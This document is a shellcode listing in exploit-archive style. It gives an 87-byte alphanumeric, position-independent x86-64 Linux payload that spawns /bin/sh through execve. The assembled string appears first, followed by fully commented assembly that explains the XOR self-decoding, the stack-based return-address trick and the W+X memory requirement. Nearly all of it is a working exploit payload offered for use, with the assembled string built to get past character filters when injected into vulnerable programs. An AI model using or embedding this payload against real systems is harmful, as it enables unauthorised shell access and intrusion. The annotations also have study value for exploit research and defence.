Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); - 87 Byte
#Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
#Author: Breaking.Technology
#Date: 06 November 2014
#Vendor Homepage: http://breaking.technology
#Version: x86-64 platforms
#Classification: 64 bit shellcode
#Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt
#
# Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
# This shellcode will successfully execute every time as long as it is returned to.
# (c) 2014 Breaking Technology, Inc.
# http://breaking.technology/
#
# Assembled (87 bytes):
# XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o
#
# Analyst notes (GAS/AT&T syntax, x86-64 Linux raw-syscall ABI):
#   - Every emitted byte is in [0-9A-Za-z]. The '...' tag on each line is the
#     ASCII form of the instruction it annotates. "entry %rsp" below means the
#     value of %rsp at the first byte of _start.
#   - Entry assumption: control arrives through a `ret`, so the qword at
#     entry %rsp - 8 holds the address of _start. get_return_pointer reads that
#     slot back to learn its own address. That is the only source of position
#     independence here and the reason it does not work if merely jumped to.
#   - Self-modifying: decode_encoded_code and decode_encoded_data XOR bytes at
#     0x4b(%rsi) and 0x53(%rsi) inside this very buffer, so the buffer must be
#     mapped writable AND executable. On a W^X / NX mapping the first decode
#     write faults before any syscall is issued.
#   - Stack side effects: the two slots above entry %rsp are reused as scratch,
#     4 bytes at 0x7c above entry %rsp are overwritten with the dword -8, and
#     the consumed return-address slot is first low-byte-flipped and then
#     overwritten with the pointer to "/bin/sh\0".
#   - Register roles: %rcx = pointer to the scratch slot (entry %rsp + 8),
#     %esi = 0xff then the address of _start, %rdi = -8 then the path pointer,
#     %rax = the XOR key, then "/bin/sh\0", then the syscall number 0x3b.
.section .data
.section .text
.globl _start
_start:                                 # "XX"
        pop     %rax                    # 'X'  == add $0x8,%rsp: step over the slot above entry %rsp
        pop     %rax                    # 'X'  == add $0x8,%rsp: and the next one, so the scratch pushes
                                        #       below land on these two slots and leave the consumed
                                        #       return-address slot intact until get_return_pointer reads it
prepare_ff:                             # "j0TYX45Pk13"
        push    $0x30                   # 'j0'  scratch qword 0x30 at entry %rsp + 8
        push    %rsp                    # 'T'
        pop     %rcx                    # 'Y'   %rcx -> the scratch slot (entry %rsp + 8)
        pop     %rax                    # 'X'   %rax = 0x30
        xor     $0x35, %al              # '45'  %al  = 0x30 ^ 0x35 = 0x05
        push    %rax                    # 'P'   (%rcx) = 0x05 (the scratch slot is reused)
        imul    $0x33, (%rcx), %esi     # 'k13' %esi = 0x05 * 0x33 = 0x000000ff
prepare_f8:                             # "VX4047"
        # mov %rsi, %rax done through the stack so every byte stays alphanumeric
        push    %rsi                    # 'V'
        pop     %rax                    # 'X'   %rax = %rsi = 0x000000ff
        # mov $0xf8, %al
        xor     $0x30, %al              # '40'  %al = 0xcf
        xor     $0x37, %al              # '47'  %al = 0xcf ^ 0x37 = 0xf8, %rax = 0x00000000000000f8
write_negative_8:                       # "3At1At1qu1qv1qw"
        # mov %eax, 0x74(%rcx) as an XOR pair. The dword at 0x74(%rcx) is whatever the
        # caller left 0x7c bytes above entry %rsp; it is clobbered here.
        xor     0x74(%rcx), %eax        # '3At' %eax = 0xf8 ^ old
        xor     %eax, 0x74(%rcx)        # '1At' dword at 0x74(%rcx) = old ^ (0xf8 ^ old) = 0x000000f8
        # mov %sil into bytes 0x75..0x77: each dword XOR with 0x000000ff flips only its low byte
        xor     %esi, 0x75(%rcx)        # '1qu' byte 0x75 = 0x00 ^ 0xff = 0xff
        xor     %esi, 0x76(%rcx)        # '1qv' byte 0x76 = 0xff
        xor     %esi, 0x77(%rcx)        # '1qw' byte 0x77 = 0xff
        # bytes 0x74..0x77 are now f8 ff ff ff: the 32-bit dword -8 sits at 0x74(%rcx)
read_negative_8:                        # "Hcyt"
        # mov -8, %rdi via a sign-extending dword load (movslq)
        movslq  0x74(%rcx), %rdi        # 'Hcyt' %rdi = -8 (0xfffffffffffffff8)
get_return_pointer:                     # "14yH34y"
        # mov -0x10(%rcx), %rsi: (%rcx,%rdi,2) = %rcx + 2*(-8) = entry %rsp - 8, the slot the
        # `ret` that transferred control here popped, so it holds the address of _start.
        # Two XORs with %rsi = 0xff recover it: the slot's low byte is flipped in place,
        # then XORing the slot into %rsi cancels the 0xff and leaves the raw address.
        xor     %esi, (%rcx, %rdi, 2)   # '14y'  dword in the old return slot ^= 0xff
        xor     (%rcx, %rdi, 2), %rsi   # 'H34y' %rsi = 0xff ^ (addr ^ 0xff) = address of _start
prepare_key:                            # "hj5XVX"
        # put the XOR key into %eax; little-endian, so the immediate reads "j5XV" in the byte stream
        push    $0x5658356a             # 'hj5XV'
        pop     %rax                    # 'X'   %rax = 0x000000005658356a
decode_encoded_code:                    # "1FK"
        # self-modifying write into this buffer (offset 0x4b = encoded_code): requires W+X memory
        xor     %eax, 0x4b(%rsi)        # '1FK' the 4 bytes at encoded_code become pop %rsi / pop %rdi / syscall
decode_encoded_data:                    # "1FSH3FO"
        xor     %eax, 0x53(%rsi)        # '1FS'  encoded_data + 4 in memory: "EF0V" ^ key = "/sh\0"
        xor     0x4f(%rsi), %rax        # 'H3FO' %rax = key ^ qword at encoded_data = "/bin/sh\0"
                                        #        (low dword: "EW18" ^ key = "/bin"; high dword: "/sh\0" ^ 0).
                                        #        Bytes 0x4f..0x52 in memory stay encoded; only %rax is decoded.
begin_stack_setup:                      # "PT"
        push    %rax                    # 'P' "/bin/sh\0" qword stored at entry %rsp
        push    %rsp                    # 'T' pointer to that qword, written over the consumed return slot
zero_rax:                               # "j0X40"
        # xor %rax, %rax
        push    $0x30                   # 'j0'
        pop     %rax                    # 'X'
        xor     $0x30, %al              # '40' %rax = 0 (NULL)
end_stack_setup:                        # "PP"
        push    %rax                    # 'P' NULL, popped into %rsi (argv) by the decoded code
        push    %rax                    # 'P' NULL, popped into %rdx (envp) at begin_stack_run
mov_3b_al:                              # "4u4N"
        # mov $0x3b, %al
        xor     $0x75, %al              # '4u' %al = 0x75
        xor     $0x4e, %al              # '4N' %al = 0x75 ^ 0x4e = 0x3b = execve on x86-64
begin_stack_run:                        # "Z"
        pop     %rdx                    # 'Z' %rdx = NULL (envp)
encoded_code:                           # "4jWS"
        # as assembled: 0x34 0x6a 0x57 0x53. decode_encoded_code XORs these with the
        # key before execution reaches them, so the CPU actually runs:
        .byte   0x34                    # -> 0x5e  pop %rsi     %rsi = NULL (argv)
        .byte   0x6a                    # -> 0x5f  pop %rdi     %rdi = pointer to "/bin/sh\0"
        .byte   0x57                    # -> 0x0f  \ syscall    execve("/bin/sh\0", NULL, NULL)
        .byte   0x53                    # -> 0x05  /
        # syscall(%rax) = function(%rdi, %rsi, %rdx)
        # syscall(0x3b) = execve("/bin/sh\0", NULL, NULL)
encoded_data:                           # "EW18EF0V", decoded to "/bin/sh\0"
        # as assembled: 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
        # decode_encoded_data rewrites only the last four bytes in memory ("/sh\0");
        # the first four are decoded into %rax, not in place.
        .byte   0x45                    # / (decoded in %rax only)
        .byte   0x57                    # b
        .byte   0x31                    # i
        .byte   0x38                    # n
        .byte   0x45                    # / (rewritten in memory)
        .byte   0x46                    # s
        .byte   0x30                    # h
        .byte   0x56                    # \0
# 0day.today [2024-11-15] #